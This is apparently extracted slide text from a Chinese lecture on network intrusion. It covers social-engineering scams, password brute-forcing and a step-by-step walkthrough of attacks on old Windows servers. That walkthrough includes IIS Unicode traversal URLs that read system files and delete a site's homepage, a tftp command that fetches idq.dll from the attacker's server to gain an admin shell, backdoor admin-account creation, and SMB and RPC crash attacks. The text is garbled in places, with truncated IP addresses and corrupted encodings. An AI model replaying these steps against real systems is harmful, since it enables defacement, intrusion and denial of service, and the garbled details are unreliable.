第7講網(wǎng)絡(luò)入侵

第7講網(wǎng)絡(luò)入侵內(nèi)容提要社會(huì)工程學(xué)攻擊物理攻擊暴力攻擊利用Unicode漏洞攻擊利用緩沖區(qū)溢出漏洞進(jìn)行攻擊等技術(shù)。并結(jié)合實(shí)際，介紹流行的攻擊工具的使用以及部分工具的代碼實(shí)現(xiàn)。社會(huì)工程學(xué)攻擊社會(huì)工程學(xué)是使用計(jì)謀和假情報(bào)去獲得密碼和其他敏感信息的科學(xué)?；蛘哒f(shuō)是一種通過(guò)對(duì)受害者心理弱點(diǎn)、本能反應(yīng)、好奇心、信任、貪婪等心理陷阱進(jìn)行諸如欺騙、傷害等危害手段，取得自身利益的手法，近年來(lái)已成迅速上升甚至濫用的趨勢(shì)。研究一個(gè)站點(diǎn)的策略其中之一就是盡可能多的了解這個(gè)組織的個(gè)體，因此黑客不斷試圖尋找更加精妙的方法從，他們希望滲透的組織那里獲得信息社會(huì)工程學(xué)攻擊舉個(gè)例子：一組高中學(xué)生曾經(jīng)想要入侵某公司的網(wǎng)絡(luò)，他們擬定了一個(gè)表格，調(diào)查看上去顯得是無(wú)害的個(gè)人信息，例如所有秘書(shū)和行政人員和他們的配偶、孩子的名字。這些從學(xué)生轉(zhuǎn)變成的黑客說(shuō)這種簡(jiǎn)單的調(diào)查是他們社會(huì)研究工作的一部分。利用這份表格這些學(xué)生能夠快速的進(jìn)入系統(tǒng)，因?yàn)榫W(wǎng)絡(luò)上的大多數(shù)人是使用寵物和他們配偶名字作為密碼。社會(huì)工程學(xué)攻擊1、打電話請(qǐng)求密碼

盡管不像前面討論的策略那樣聰明，打電話尋問(wèn)密碼也經(jīng)常奏效。在社會(huì)工程中那些黑客冒充失去密碼的合法雇員，經(jīng)常通過(guò)這種簡(jiǎn)單的方法重新獲得密碼。2、偽造Email一個(gè)黑客使用telnet可以截取任何一個(gè)身份證發(fā)送Email的全部信息，這樣的Email消息是真的，因?yàn)樗l(fā)自于一個(gè)合法的用戶。在這種情形下這些信息顯得是絕對(duì)的真實(shí)。黑客可以偽造這些。一個(gè)冒充系統(tǒng)管理員或經(jīng)理的黑客就能較為輕松的獲得大量的信息，黑客就能實(shí)施他們的惡意陰謀。社會(huì)工程學(xué)攻擊舉例1、請(qǐng)狼入室李小姐是某個(gè)大公司的經(jīng)理秘書(shū)，她工作的電腦上存儲(chǔ)著公司的許多重要業(yè)務(wù)資料，所以屬于公司著重保護(hù)的對(duì)象，安全部門設(shè)置了層層安全防護(hù)措施，可以說(shuō)，她的電腦要從外部攻破是根本不可能的事情。為了方便修改設(shè)置和查殺病毒，安全部門可以直接通過(guò)網(wǎng)絡(luò)服務(wù)終端對(duì)李小姐的電腦進(jìn)行全面設(shè)置。也許貪圖方便，維護(hù)員與李小姐的日常聯(lián)系是通過(guò)QQ進(jìn)行的。這天，李小姐剛打開(kāi)QQ，就收到維護(hù)員的消息：“小李，我忘記登錄密碼了，快告訴我，有個(gè)緊急的安全設(shè)置要做呢！”因?yàn)楹途S護(hù)員很熟了，李小姐就把密碼發(fā)了過(guò)去。。。。一夜之間，公司的主要競(jìng)爭(zhēng)對(duì)手掌握了公司的業(yè)務(wù)！社會(huì)工程學(xué)攻擊舉例由于安全部門距離李小姐的工作地點(diǎn)有好些距離，管理不方便，所以公司讓他們直接通過(guò)網(wǎng)絡(luò)來(lái)管理機(jī)器！他與李小姐之間的聯(lián)系通過(guò)QQ進(jìn)行。問(wèn)題偏偏就出在QQ上。作為安全人員，他自然知道密碼的重要性，因此他的任何密碼都設(shè)置得十分復(fù)雜，窮舉幾乎不可能。至于被入侵，那更不可能發(fā)生。然而百密仍有一疏，他做夢(mèng)也沒(méi)想到對(duì)手利用QQ的取回密碼功能輕易拿到了他的密碼。剖析：

李小姐正是出于對(duì)維護(hù)員的信任才被對(duì)方欺騙的。因?yàn)槟莻€(gè)在QQ上出現(xiàn)的維護(hù)員根本不是公司的維護(hù)員本人，而是對(duì)手盜取了維護(hù)員的QQ，再利用一個(gè)小小的信任關(guān)系，就輕易取得了登錄密碼。2、形同虛設(shè)的密碼社會(huì)工程學(xué)攻擊舉例剖析：他在輸入提示答案的時(shí)候，下意識(shí)地輸入了心里最重要的那個(gè)人的名字。但是對(duì)手也知道他心里那個(gè)人的名字，所謂的“知己知彼”小馬絢麗的QQ秀和一些特色服務(wù)，但舍不得花錢。好想有免費(fèi)的Q幣。某天一QQ好友給他發(fā)來(lái)一個(gè)URL，還說(shuō)這個(gè)網(wǎng)站通過(guò)一定的點(diǎn)擊次數(shù)提供Q幣。如此好的機(jī)會(huì)小馬怎能放過(guò)？他根據(jù)網(wǎng)站的提示輸入了QQ號(hào)碼和密碼完成注冊(cè)，然后給QQ上的朋友們發(fā)了網(wǎng)址。然而等了許久，自己的Q幣依然沒(méi)有動(dòng)靜。第二天，小馬想登錄QQ時(shí)，卻發(fā)現(xiàn)怎么也登錄不上去了——QQ密碼被人改了。這是最近鬧得轟轟烈烈的QQ欺騙案件之一。3、E時(shí)代的守株待兔社會(huì)工程學(xué)攻擊舉例大哥你是不是太搞笑？！改我密碼還要5分鐘??？麻煩你快一點(diǎn)好不好！還有QQ中獎(jiǎng)要求用戶填寫(xiě)密碼以待“驗(yàn)證”等伎倆，無(wú)論什么手法，最終結(jié)局都是一樣的，那就是——用戶的密碼被人改掉。如此白癡的騙局，只要有點(diǎn)常識(shí)的人都不難理解其中的“笑話”，奇怪的是卻屢屢有人上當(dāng)，究其原因，就是因?yàn)閲?guó)人的貪小便宜心理作祟。剖析：這就是著名的“網(wǎng)絡(luò)釣魚(yú)”！論壇常有帖子：“……騰訊公司預(yù)留了專用號(hào)碼作為充值號(hào)，此號(hào)是自動(dòng)讀取指令的，為了不引起大家的注意，所以這個(gè)QQ比較普通，這個(gè)QQ一般隱身。只要發(fā)送{Jerusalum/PLO號(hào)碼}{Vesselin

Bontchev密碼}{FRALDMUZKQ幣數(shù)量}，然后下線5分鐘，等著收Q幣吧。”社會(huì)工程學(xué)攻擊舉例王先生是一家銀行的職員，通常都是直接在網(wǎng)絡(luò)上完成轉(zhuǎn)賬操作的。由于他的電腦水平不高，前不久被一個(gè)初學(xué)者駭客入侵了機(jī)器。在請(qǐng)來(lái)專業(yè)人員修復(fù)系統(tǒng)更改密碼后，王先生照例登錄網(wǎng)絡(luò)銀行為手機(jī)繳費(fèi)，可是才過(guò)一會(huì)兒他的冷汗就出來(lái)了：網(wǎng)絡(luò)銀行登錄不進(jìn)去了！深感大事不妙的王先生去銀行辦理了相關(guān)手續(xù)，查賬發(fā)現(xiàn)賬戶里的錢已經(jīng)被人劃走了。因?yàn)橥跸壬噶舜蟛糠秩硕紩?huì)犯的致命錯(cuò)誤：通常為了記憶方便，人們會(huì)把幾處的密碼都設(shè)置成一樣的，例如QQ、E-MAIL、FTP、網(wǎng)站等的密碼，而王先生更進(jìn)一步把所有密碼都弄成一樣的了，因此入侵者在得到王先生的機(jī)器登錄密碼后也就得到了網(wǎng)絡(luò)銀行的密碼。正是因?yàn)檫@個(gè)普遍心理特點(diǎn)，受害者往往都是被入侵者一鍋端了！因?yàn)楹?jiǎn)單密碼和相同密碼是大部分人都會(huì)碰到的心理弱點(diǎn)4、輕而易舉的入侵物理攻擊與防范物理安全是保護(hù)一些比較重要的設(shè)備不被接觸。物理安全比較難防，因?yàn)楣敉鶃?lái)自能夠接觸到物理設(shè)備的用戶。例5-1得到管理員密碼用戶登錄以后，所有的用戶信息都存儲(chǔ)在系統(tǒng)的進(jìn)程，winlogon.exe中。可用FindPass等工具對(duì)該進(jìn)程進(jìn)行解碼。將它放到C:\后執(zhí)行該程序，將得到當(dāng)前用戶得登錄名！權(quán)限提升有時(shí)候，管理員為了安全，給其他用戶建立一個(gè)普通用戶帳號(hào)，認(rèn)為這樣就安全了。其實(shí)不然，用普通用戶帳號(hào)登錄后，可以利用工具GetAdmin.exe將自己加到管理員組或者新建一個(gè)具有管理員權(quán)限的用戶。普通用戶建立管理員帳號(hào)輸入一個(gè)用戶名如：IAMHacker，點(diǎn)擊"確定"后，然后點(diǎn)擊主窗口"OK"，出現(xiàn)添加成功的窗口。暴力攻擊暴力攻擊的一個(gè)具體例子是，一個(gè)黑客試圖使用計(jì)算機(jī)和信息去破解一個(gè)密碼。一個(gè)黑客需要破解—段單一的被用非對(duì)稱密鑰加密的信息，為了破解這種算法，一個(gè)黑客需要求助于非常精密復(fù)雜的方法，它使用120個(gè)工作站，兩個(gè)超級(jí)計(jì)算機(jī)利用從三個(gè)主要的研究中心獲得的信息，即使擁有這種配備，它也將花掉八天的時(shí)間去破解加密算法，實(shí)際上破解加密過(guò)程八天已是非常短暫的時(shí)間了。字典文件一次字典攻擊能否成功，很大因素上決定與字典文件。一個(gè)好的字典文件可以高效快速的得到系統(tǒng)的密碼。攻擊不同的公司、不通地域的計(jì)算機(jī)，可以根據(jù)公司管理員的姓氏以及家人的生日，可以作為字典文件的一部分，公司以及部門的簡(jiǎn)稱一般也可以作為字典文件的一部分，這樣可以大大的提高破解效率。一個(gè)字典文件本身就是一個(gè)標(biāo)準(zhǔn)的文本文件，其中的每一行就代表一個(gè)可能的密碼。目前有很多工具軟件專門來(lái)創(chuàng)建字典文件。暴力破解操作系統(tǒng)密碼字典文件為暴力破解提供了一條捷徑，程序首先通過(guò)掃描得到系統(tǒng)的用戶，然后利用字典中每一個(gè)密碼來(lái)登錄系統(tǒng)，看是否成功，如果成功則將密碼顯示.比如使用字典文件，利用GetNTUser依然可以將管理員密碼破解出來(lái).暴力破解郵箱密碼郵箱的密碼一般需要設(shè)置到八位以上，否則七位以下的密碼容易被破解。尤其七位全部是數(shù)字，更容易被破解。黑雨——POP3郵箱密碼暴力破解器.暴力破解軟件密碼目前許多軟件都具有加密的功能，比如Office文檔、Winzip文檔和WinRaR文檔等等。這些文檔密碼可以有效的防止文檔被他人使用和閱讀。但是如果密碼位數(shù)不夠長(zhǎng)的話，同樣容易被破解。破解Word文檔密碼AdvancedOfficeXPPasswordRecovery可以快速破解Word文檔密碼。破解Word文檔密碼設(shè)置密碼長(zhǎng)度最短是一位，最長(zhǎng)是三位，點(diǎn)擊工具欄開(kāi)始的圖標(biāo)，開(kāi)始破解密碼，大約兩秒鐘后，密碼被破解了。Unicode漏洞專題通過(guò)打操作系統(tǒng)的補(bǔ)丁程序，就可以消除漏洞。只要是針對(duì)漏洞進(jìn)行攻擊的案例都依賴于操作系統(tǒng)是否打了相關(guān)的補(bǔ)丁。Unicode漏洞是2000-10-17發(fā)現(xiàn)的，受影響的版本：MicrosoftIIS5.0+MicrosoftWin2K系列版本MicrosoftIIS4.0+WindowsNT4.0消除該漏洞的方式是安裝操作系統(tǒng)的補(bǔ)丁，只要安裝了SP1以后，該漏洞就不存在了。微軟IIS4.0和5.0都存在利用擴(kuò)展UNICODE字符取代"/"和"\"而能利用"../"目錄遍歷的漏洞。Unicode漏洞的檢測(cè)方法使用掃描工具X-Scan來(lái)檢測(cè)Unicode漏洞是否存在。目標(biāo)主機(jī)IP為：09，Unicode漏洞屬于IIS漏洞，所以這里只掃描IIS漏洞就可以了，X-Scan設(shè)置。Unicode漏洞的檢測(cè)方法將主機(jī)添加到目標(biāo)地址，掃描結(jié)果如圖。Unicode漏洞的檢測(cè)方法只要是/scripts開(kāi)頭的漏洞都是Unicode漏洞。比如：/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir其中/scripts目錄是IIS提供的可以執(zhí)行命令的一個(gè)有執(zhí)行程序權(quán)限的一個(gè)目錄Unicode漏洞的檢測(cè)方法scripts目錄一般系統(tǒng)盤根目錄下的Inetpub目錄下Unicode漏洞的檢測(cè)方法在Windows的目錄中，可以使用“../”來(lái)訪問(wèn)上一級(jí)目錄在瀏覽器中利用“scripts/../../”可以訪問(wèn)到系統(tǒng)盤根目錄，訪問(wèn)“scripts/../../winnt/system32”就訪問(wèn)到系統(tǒng)的system32了，在system32目錄下包含許多重要的系統(tǒng)文件，比如cmd、net命令，可以利用該文件新建用戶，刪除文件等操作。瀏覽器地址欄中禁用符號(hào)“../”，但是可以使用符號(hào)“/”的Unicode的編碼。比如“/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir”中的“%c0%2f”就是“/”的Unicode編碼。這條語(yǔ)句是執(zhí)行dir命令列出目錄結(jié)構(gòu)。Unicode漏洞此漏洞從中文IIS4.0+SP6開(kāi)始，還影響中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1，臺(tái)灣繁體中文也同樣存在這樣的漏洞。在NT4中/編碼為“%c1%9c”或者“%c1%9c”，WIN2000英文版是“%c0%af”。但從國(guó)外某些站點(diǎn)得來(lái)的資料顯示，還有以下的編碼可以實(shí)現(xiàn)對(duì)該漏洞的檢測(cè)，該編碼存在于日文版、韓文版等操作系統(tǒng)。%c1%pc

%c0%9v

%c0%qf

%c1%8s

%e0%80%af利用漏洞讀取系統(tǒng)盤目錄利用該漏洞讀取出計(jì)算機(jī)上目錄列表，比讀取C盤的目錄：09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\利用漏洞讀取系統(tǒng)盤目錄利用語(yǔ)句得到對(duì)方計(jì)算機(jī)上裝了幾個(gè)操作系統(tǒng)以及操作系統(tǒng)的類型，只要讀取C盤下的boot.ini文件就可以了。09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+type+c:\boot.ini利用漏洞刪除主頁(yè)利用Unicode可以方便的更改對(duì)方的主頁(yè)，若對(duì)方網(wǎng)站的根路徑在“C:\Initpub\wwwroot”（系統(tǒng)默認(rèn)）下，可以刪除該路徑下的文件“default.asp”來(lái)刪除主頁(yè)，這里的“default.asp”文件是IIS的默認(rèn)啟動(dòng)頁(yè)面。使用的語(yǔ)句是：09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+del+c:\inetpub\wwwroot\default.asp利用漏洞刪除主頁(yè)拷貝文件將cmd.exe文件拷貝到scripts目錄，并改名為c.exe：09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+c.exe查看C盤的目錄以后使用cmd.exe命令就方便了，比如查看C盤的目錄，使用的語(yǔ)句就可以簡(jiǎn)化為：09/scripts/c.exe?/c+dir+c:\利用漏洞入侵系統(tǒng)在地址欄上執(zhí)行命令，用戶的權(quán)限比較低，像net等系統(tǒng)管理指令不能執(zhí)行。利用Unicode可以入侵對(duì)方的系統(tǒng)，并得到管理員權(quán)限。首先需要向?qū)Ψ椒?wù)器上傳一些文件，入侵的第一步，建立tftp服務(wù)器，向?qū)Ψ降膕cripts文件夾傳幾個(gè)文件。需要上傳一個(gè)名為“idq.dll”的文件，為了上傳這個(gè)文件，首先在本地計(jì)算機(jī)上搭建一個(gè)TFTP服務(wù)器，它一般用來(lái)傳輸單個(gè)文件。使用工具軟件tftpd32.exe建立服務(wù)器。將idq.dll和tftpd32.exe放在本地的同一目錄下，執(zhí)行tftpd32.exe程序。利用漏洞入侵系統(tǒng)利用漏洞入侵系統(tǒng)在本地的TFTP的服務(wù)器就建立好了，保留這個(gè)窗口，通過(guò)該服務(wù)器向?qū)Ψ絺鬟fidq.dll文件。在瀏覽器中執(zhí)行命令：“09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp+-i+10+get+idq.dll”，命令其實(shí)是“tftp–i10getidq.dll”意思是從10服務(wù)器上獲取idq.dll文件上載文件并查看成果入侵對(duì)方主機(jī)拷貝ispc.exe到本地計(jì)算機(jī)的C:\，在命令行下執(zhí)行：“ispc.exe09/scripts/idq.dll”，連接成功后就直接進(jìn)入了對(duì)方的DOS命令行下，而且具有管理員權(quán)限。建立用戶可以在對(duì)方計(jì)算機(jī)上做管理員可以做的一切事情，比如添加用戶。建立用戶名：Hacker123，密碼：Hacker123利用打印漏洞攻擊利用打印漏洞可以在目標(biāo)的計(jì)算機(jī)上添加一個(gè)具有管理員權(quán)限的用戶（用戶名與密碼均為：hax）。經(jīng)過(guò)測(cè)試，該漏洞在SP2、SP3以及SP4版本上依然存在，但是不能保證100%入侵成功。工具：cniis.exe，格式是：cniis090參數(shù)1：是目標(biāo)的IP地址，參數(shù)2：目標(biāo)系統(tǒng)的補(bǔ)丁號(hào)因?yàn)?9沒(méi)有打補(bǔ)丁，這里就是0。SMB致命攻擊SMB（SessionMessageBlock，會(huì)話消息塊協(xié)議）又叫做NetBIOS或LanManager協(xié)議，用于不同計(jì)算機(jī)之間文件、打印機(jī)、串口和通訊的共享和用于Windows平臺(tái)上提供磁盤和打印機(jī)的共享。SMB協(xié)議版本有很多種，在Windows98、WindowsNT、Windows2000和XP使用的是NTLM0.12版本。利用該協(xié)議可以進(jìn)行各方面的攻擊，比如可以抓取其他用戶訪問(wèn)自己計(jì)算機(jī)共享目錄的SMB會(huì)話包，然后利用SMB會(huì)話包登錄對(duì)方的計(jì)算機(jī)。下面介紹利用SMB協(xié)議讓對(duì)方操作系統(tǒng)系統(tǒng)重新啟動(dòng)或者藍(lán)屏。致命攻擊使用的工具軟件是：SMBDieV1.0，該軟件對(duì)打了SP3、SP4的計(jì)算機(jī)依然有效，必須打?qū)ｉT的SMB補(bǔ)丁.攻擊需要兩個(gè)參數(shù)：對(duì)方的IP地址和對(duì)方的機(jī)器名致命攻擊然后再點(diǎn)按鈕“Kill”，如果參數(shù)輸入沒(méi)有錯(cuò)誤的話，對(duì)方計(jì)算機(jī)立刻重啟或藍(lán)屏，命中率幾乎100%緩沖區(qū)溢出攻擊目前最流行的一種攻擊技術(shù)就是緩沖區(qū)溢出攻擊。當(dāng)目標(biāo)操作系統(tǒng)收到了超過(guò)了它的最大能接收的信息量的時(shí)候，將發(fā)生緩沖區(qū)溢出。這些多余的數(shù)據(jù)將使程序的緩沖區(qū)溢出，然后覆蓋了實(shí)際的程序數(shù)據(jù)，緩沖區(qū)溢出使目標(biāo)系統(tǒng)的程序被修改，經(jīng)過(guò)這種修改的結(jié)果使在系統(tǒng)上產(chǎn)生一個(gè)后門。這項(xiàng)攻擊對(duì)技術(shù)要求比較高，但是攻擊的過(guò)程卻非常簡(jiǎn)單。緩沖區(qū)溢出原理很簡(jiǎn)單，比如程序：緩沖區(qū)溢出攻擊voidfunction(char*szPara1){ charbuff[16];

strcpy(buffer,szPara1);}程序中利用strcpy函數(shù)將szPara1中的內(nèi)容拷貝到buff中，只要szPara1的長(zhǎng)度大于16，就會(huì)造成緩沖區(qū)溢出。存在strcpy函數(shù)這樣問(wèn)題的C語(yǔ)言函數(shù)還有：strcat()、gets()、scanf()等。RPC漏洞溢出遠(yuǎn)程過(guò)程調(diào)用RPC（RemoteProcedureCall)，是操作系統(tǒng)的一種消息傳遞功能，允許應(yīng)用程序呼叫網(wǎng)絡(luò)上的計(jì)算機(jī)。當(dāng)系統(tǒng)啟動(dòng)的時(shí)候，自動(dòng)加載RPC服務(wù)?？梢栽诜?wù)列表中看到系統(tǒng)的RPC服務(wù)，如圖。用RPC漏洞建立超級(jí)用戶RPC溢出漏洞，對(duì)SP4也適用，必須打?qū)Ｓ醚a(bǔ)丁。利用工具scanms.exe文件檢測(cè)RPC漏洞，該工具是ISS安全公司2003年7月30日發(fā)布的，運(yùn)行在命令行下用來(lái)檢測(cè)指定IP地址范圍內(nèi)機(jī)器是否已經(jīng)安裝了“DCOMRPC接口遠(yuǎn)程緩沖區(qū)溢出漏洞（823980-MS03-026）”補(bǔ)丁程序。如果沒(méi)有安裝補(bǔ)丁程序，該IP地址就會(huì)顯示出“[VULN]”。首先拷貝該文件到C盤根目錄，現(xiàn)在要檢查地址段09到10的主機(jī)，執(zhí)行命令“scanms.exe09-10”檢查緩沖區(qū)溢出漏洞利用工具軟件attack.exe對(duì)09進(jìn)行攻擊。攻擊的結(jié)果將在對(duì)方計(jì)算機(jī)上建立一個(gè)具有管理員權(quán)限的用戶，并終止了對(duì)方的RPC服務(wù)。新建用戶的用戶名和密碼都是qing10，這樣就可以登錄對(duì)方計(jì)算機(jī)了，RPC服務(wù)停止操作系統(tǒng)將有許多功能不能使用，非常容易被管理員發(fā)現(xiàn)，可用OpenRpcSs來(lái)給對(duì)方重啟RPC服務(wù)。攻擊的全過(guò)程利用IIS溢出進(jìn)行攻擊1、利用軟件SnakeIIS溢出工具可以讓對(duì)方的IIS溢出，還可以捆綁執(zhí)行的命令和在對(duì)方計(jì)算機(jī)上開(kāi)辟端口。2、它適用于各類操作系統(tǒng)，如對(duì)09進(jìn)行攻擊，其系統(tǒng)為Win2K，沒(méi)有安裝補(bǔ)丁程序，攻擊完畢后，開(kāi)辟一個(gè)813端口，并在對(duì)方計(jì)算機(jī)上執(zhí)行命令“dirc:\。3、點(diǎn)擊按鈕“IDQ溢出”，出現(xiàn)攻擊成功的提示框利用IIS溢出進(jìn)行攻擊利用IIS溢出進(jìn)行攻擊現(xiàn)813端口已經(jīng)開(kāi)放，可用nc.exe連接到該端口，將會(huì)自動(dòng)執(zhí)行剛才發(fā)送的命令“dirc:\